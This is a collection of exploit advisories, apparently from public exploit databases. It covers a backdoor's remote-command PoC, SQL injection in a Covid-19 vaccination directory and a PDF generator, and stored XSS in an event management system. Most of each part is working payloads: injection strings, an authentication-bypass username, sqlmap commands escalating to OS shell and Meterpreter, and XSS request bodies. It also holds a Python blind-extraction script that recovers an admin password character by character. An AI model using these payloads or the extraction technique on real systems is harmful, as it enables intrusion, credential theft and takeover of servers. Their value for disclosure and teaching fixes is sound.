DEL or ERASE or RM <PATH> - removes file PATH
COPY or CP <PATH1> <PATH2> - copies file from PATH1 to PATH2
CMD or SYSTEM or SYS <CMND> - returns results of system command (by COMMAND.COM)
TELNET <NAME> [PORT] - telnets to address NAME on port PORT (default 23)
KILL <NAME> or <PID> - kills the process named NAME or PID (obtained via PS)
DIR or LS [PATH] - lists the directory
DEL or ERASE, RM <PATH> - deletes file PATH
COPY or CP <PATH1> <PATH2> - copies file from PATH1 to PATH2
CMD or SYS <COMMAND> - prints the result of a system command (via COMMAND.COM)
SHUTDOWN - turn off computer
OPEN <NAME> - opens file NAME with default program (eg. MP3 with WinAmp)
SHUTDOWN - reset (or shut down) the computer
OPEN <NAME> - opens file NAME with the default program, e.g. MP3 with WinAmp

Exploit/PoC:
C:\>nc64.exe x.x.x.x 51966
 CAFEiNi 1.1
Enter your password:
speedfire
[32mC:\Users\Victim\Desktop>[37mexec c:\windows\system32\calc.exe
exec c:\windows\system32\calc.exe
STATUS: program runned
[32mC:\Users\Victim\Desktop>[37m
[32mC:\Users\Victim\Desktop>[37mcd \Windows
[32mC:\Windows>[37mSHUTDOWN
SHUTDOWN
STATUS: I'm going to shutdown computer

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code># Title: Covid-19 Directory on Vaccination System 1.0 Blind boolean SQLi To RCE<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/covid-19-vaccination_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1 - Go to: http://0day.gov/covid-19/hospital.php?cmdcategory=1<br /># 2 - Manually inject the boolean-based blind SQLi: https://0day.gov/covid-19/hospital.php?cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hejap%'='hejap<br /># 3 - SQLi to RCE (r00t)<br /># 4 - Upload webshell<br /># 5 - Web shell to meterpreter full TTY shell<br /><br />#vulnerability Code php<br />$_GET['cmdcategory'] is interpolated straight into the LIKE pattern. The stmt_init()/prepare() calls do not help: the user value is already part of the SQL string before prepare() runs, and nothing is bound as a parameter. The page prints one &lt;option&gt; per matching row, which is the boolean oracle the payload below relies on.<br /><br />---<br />```php<br /> $category = $_GET['cmdcategory'];<br /> // $conn = new mysqli ($servername, $username, $password, $dbname) or die("Connection to Database Failed");<br /> $stmt = $conn->stmt_init();<br /> $sql = "SELECT vaccination_center FROM hospital WHERE category_id = (select id_no from category where category like '$category%')";<br /> $stmt->prepare($sql);<br /> $stmt->execute();<br /> $result = $stmt->get_result();<br /> while($resultRow = $result->fetch_array(MYSQLI_NUM))<br /> echo "<option>$resultRow[0]</option>";<br /> $result->close();<br /> $stmt->close();<br />```<br />---<br />#Status: CRITICAL<br />[+] Payload GET<br /><br />---<br />GET /covid-19/hospital.php?cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hejap%'='hejap HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Cache-Control: max-age=0<br />Te: trailers<br />Connection: close<br />---<br /><br />[+] sqlmap detection output<br /><br />```<br />Parameter: cmdcategory (GET)<br /> Type: boolean-based blind<br /> Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br /> Payload: cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hJWj%'='hJWj<br />```<br /><br />#Blind SQLi: time to RCE<br />#Exploit<br /><br />```<br />sqlmap -u "http://0day.gov/covid-19/hospital.php?cmdcategory=1" -p cmdcategory --hex --time-sec=10 --dbms=mysql --technique=b --random-agent --eta -D covid19 -T admin --dump --os-shell --priv-esc<br />```<br /><br />Note: on MySQL, --os-shell only works when the database user has the FILE privilege and sqlmap can write a stager into a web-reachable directory; --priv-esc hands the resulting shell to Metasploit for local privilege escalation. Without those permissions the bug is still a full data disclosure (the admin table dump), not RCE.<br /><br /># Description:<br />The blind time SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it was privesc'd.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/xeWSc7B.png<br />https://i.imgur.com/XiVBeYa.png<br /><br /><br />----------------------------------<br /><br /><br /># Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/covid-19-vaccination_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1 - Go to: https://0day.gov/covid-19/admin/login.php<br /># 2 - SQLi Authentication Bypass, username: admin'or 1=1 or ''=' (any password)<br /><br />#vulnerability Code php<br />Both POST fields are concatenated into the query. With the payload above the WHERE clause becomes username='admin'or 1=1 or ''='' and password = '...' and status = 'Active'; because AND binds tighter than OR, the clause is true for every row and the first admin record is returned regardless of the password.<br /><br />---<br />```php<br />if(isset($_POST['btnlogin']))<br />{<br />$username = $_POST['txtusername'];<br />$password = $_POST['txtpassword'];<br />$status = 'Active';<br /> $sql = "SELECT * FROM admin WHERE username='" .$username. "' and password = '".$password."' and status = '".$status."' ";<br /><br />```<br />---<br />#Status: CRITICAL<br />[+] Payload POST<br /><br />---<br />POST /covid-19/admin/login.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 72<br />Origin: http://0day.gov<br />Connection: close<br />Referer: http://0day.gov/covid-19/admin/login.php<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br /><br />txtusername=admin%27or+1%3D1+or+%27%27%3D%27&txtpassword=hejap&btnlogin=<br />---<br /><br /># Description:<br />The login query is built by string concatenation, so the username field can be used to construct an injection that bypasses authentication without knowing a valid password.<br /><br /><br /># Proof and Exploit:<br /><br />https://i.imgur.com/oDj69Hw.png<br />https://i.imgur.com/JO4SLxa.png<br />https://i.imgur.com/kYgU7xl.png<br /><br /></code></pre>
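The two Covid-19 Directory advisories above show a boolean oracle and an authentication bypass but not how the oracle is driven to actually read data. The following is an added example, not the project's or the advisory author's code: it rebuilds both vulnerable queries from the PHP snippets over an in-memory SQLite database with constructed sample rows, registers a Python emulation of MySQL's MAKE_SET() so the page's own payload runs unchanged, extracts the admin password character by character through the hospital.php oracle, runs the login bypass, and shows the bound-parameter fix for each. Table and column names follow the PHP; the rows, the password and the character set are assumptions.

```python
"""Added example (not the project's or the advisory author's code): the two
vulnerable queries from hospital.php and admin/login.php rebuilt over an
in-memory SQLite database with constructed sample rows, so the page's own
payloads can be run offline. MySQL's MAKE_SET() is emulated with a Python UDF;
table/column names follow the PHP snippets, the sample data is invented."""
import sqlite3


def make_set(bits, *strings):
    """Minimal MySQL MAKE_SET(bits, str1, ...): comma-join the strings whose bit is set.
    MAKE_SET(1373=1373,8255) -> '8255' (truthy); MAKE_SET(1373=1374,8255) -> '' (falsy)."""
    bits = int(bits or 0)
    return ",".join(str(s) for i, s in enumerate(strings) if bits & (1 << i))


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("MAKE_SET", -1, make_set)  # -1: variadic
    conn.executescript("""
        CREATE TABLE category (id_no INTEGER PRIMARY KEY, category TEXT);
        CREATE TABLE hospital (id INTEGER PRIMARY KEY, category_id INTEGER,
                               vaccination_center TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT,
                            password TEXT, status TEXT);
        -- constructed sample data
        INSERT INTO category VALUES (1, '1st Dose'), (2, '2nd Dose');
        INSERT INTO hospital VALUES (1, 1, 'City Hospital'), (2, 2, 'County Clinic');
        INSERT INTO admin VALUES (1, 'admin', 's3cret!', 'Active');
    """)
    return conn


# --- hospital.php: cmdcategory is interpolated into the LIKE pattern -----------
def hospital_query(conn, category):
    sql = ("SELECT vaccination_center FROM hospital WHERE category_id = "
           f"(select id_no from category where category like '{category}%')")
    return [row[0] for row in conn.execute(sql)]


def hospital_query_safe(conn, category):
    """Fix: bind the pattern. % and _ still act as LIKE wildcards, but the
    value can no longer terminate the string literal."""
    sql = ("SELECT vaccination_center FROM hospital WHERE category_id = "
           "(select id_no from category where category like ?)")
    return [row[0] for row in conn.execute(sql, (category + "%",))]


def oracle(conn, condition):
    """Boolean oracle: the page emits <option> rows only when `condition` is true."""
    payload = f"1%' AND ({condition}) AND 'hejap%'='hejap"
    return len(hospital_query(conn, payload)) > 0


def extract(conn, expr, charset="abcdefghijklmnopqrstuvwxyz0123456789!", max_len=32):
    """Character-by-character boolean-blind extraction of the scalar `expr`.
    (SQLite's = is case-sensitive; on MySQL compare ASCII() values instead.)"""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"LENGTH(({expr})) >= {pos}"):
            break
        for ch in charset:
            if oracle(conn, f"SUBSTR(({expr}), {pos}, 1) = '{ch}'"):
                out += ch
                break
        else:
            raise ValueError(f"character at position {pos} not in charset")
    return out


# --- admin/login.php: username and password concatenated into the WHERE clause --
def login_query(conn, username, password):
    sql = (f"SELECT * FROM admin WHERE username='{username}' and password = "
           f"'{password}' and status = 'Active' ")
    return conn.execute(sql).fetchall()


def login_query_safe(conn, username, password):
    sql = "SELECT * FROM admin WHERE username=? and password=? and status=?"
    return conn.execute(sql, (username, password, "Active")).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("blind oracle true :", oracle(db, "MAKE_SET(1373=1373,8255)"))
    print("blind oracle false:", oracle(db, "MAKE_SET(1373=1374,8255)"))
    print("extracted admin password:", extract(db, "SELECT password FROM admin LIMIT 1"))
    bypass = "admin'or 1=1 or ''='"
    print("bypass rows (vulnerable):", len(login_query(db, bypass, "hejap")))
    print("bypass rows (bound)     :", len(login_query_safe(db, bypass, "hejap")))
```

The payload template in oracle() is exactly the page's: the leading 1%' closes the LIKE literal, the injected condition sits between two always-true terms, and the trailing 'hejap absorbs the %' that hospital.php appends. Swapping the condition for SUBSTR()/LENGTH() tests is all sqlmap's --technique=b does at scale; the fixed variants show that binding the value, not calling prepare() on an already-built string, is what closes the hole.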
<pre><code># Exploit Title: PDF Generator Web Application - 'multiple' Blind SQL Injection<br /># Date: 26/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br /># Vulnerable Code<br /><br />line 23 in file "/pdf_generator/action.php"<br /><br />$check = $this->conn->query("SELECT * FROM `file_list` where `name` = '{$name}' ".(!empty($id) ? " and id != '{$id}' " : '')." ")->num_rows;<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/pdf_generator/?page=manage_file&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=manage_file&id=1' OR NOT 3770=3770-- axnO<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=manage_file&id=1' AND (SELECT 3918 FROM (SELECT(SLEEP(5)))yLgc)-- fCtI<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: page=manage_file&id=1' UNION ALL SELECT CONCAT(0x71707a6a71,0x436a57436257674a6f4264524d524c4c4c6755634145724d4f545270794d7376774c44444c4d4545,0x717a767a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br /></code></pre>
<pre><code># Exploit Title: Royale Event Management System 1.0 - Cross-site Scripting Stored (unauthenticated)<br /># Date: 17/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />Royale Event Management System 1.0 - Cross-site Scripting Stored (unauthenticated)<br /><br /><br />Summary:<br />================<br />One Church Management System is affected by a stored Cross-site Scripting vulnerability due to missing output sanitization of certain parameters. An attacker could leverage this flaw to inject arbitrary JavaScript that executes in the victim's browser.<br /><br /><br />Severity Level:<br />================<br />6.5 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />Royale Event Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />* companyprofile.php XSS (unauthenticated) PoC. The profile form is submitted without a session; each of companyname, regno, companyaddress and companyemail carries a "&gt; attribute break-out followed by a script tag, and the stored values are rendered back unescaped.<br /><br />POST /royal_event/companyprofile.php HTTP/1.1<br />Host: target.com<br />Content-Length: 187<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/royal_event/churchprofile.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />companyname="><script>alert("XSS")</script>&regno="><script>alert("XSS")</script>&companyaddress="><script>alert("XSS")</script>&companyemail="><script>alert("XSS")</script>&country=India&mobilenumber=%2B919423979339&submit=<br /></code></pre>
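The PoC above shows the payload but not why it starts with "> or what stops it. The following is an added example, not the application's code: it decodes the PoC body, re-renders the fields into a profile form the way a page that echoes saved values into value="..." attributes would, and counts the script tags an HTML parser actually sees with and without output encoding. The field names come from the PoC; the input-tag template is an assumption about how the profile page renders.

```python
"""Added example (not the application's code): why the PoC payload starts with
"> and what neutralizes it. The form-field names come from the PoC body; the
<input value="..."> template is an assumption about how the profile page
re-renders the stored values."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed from the PoC request body above (mobilenumber is %2B-encoded there).
POC_BODY = (
    'companyname="><script>alert("XSS")</script>'
    '&regno="><script>alert("XSS")</script>'
    '&companyaddress="><script>alert("XSS")</script>'
    '&companyemail="><script>alert("XSS")</script>'
    '&country=India&mobilenumber=%2B919423979339&submit='
)


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_profile(fields, escape_output):
    """Re-render the saved profile as a form. escape_output=False mirrors the
    vulnerable page; True is the fix (htmlspecialchars(..., ENT_QUOTES) in PHP)."""
    enc = (lambda v: escape(v, quote=True)) if escape_output else (lambda v: v)
    return "".join(f'<input name="{name}" value="{enc(value)}">\n'
                   for name, value in fields.items())


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the browser's parser would actually see."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_script_tags(html):
    parser = _ScriptCounter()
    parser.feed(html)
    return parser.scripts


if __name__ == "__main__":
    fields = parse_form(POC_BODY)
    for escaped in (False, True):
        page = render_profile(fields, escape_output=escaped)
        print(f"escaped={escaped}: {count_script_tags(page)} script tag(s) injected")
```

The leading " closes the value attribute and > closes the input tag, so the script element lands in the document body; encoding " as &amp;quot; and &lt;/&gt; as entities keeps the whole string inside the attribute, which is why the fix must escape quotes and not just angle brackets.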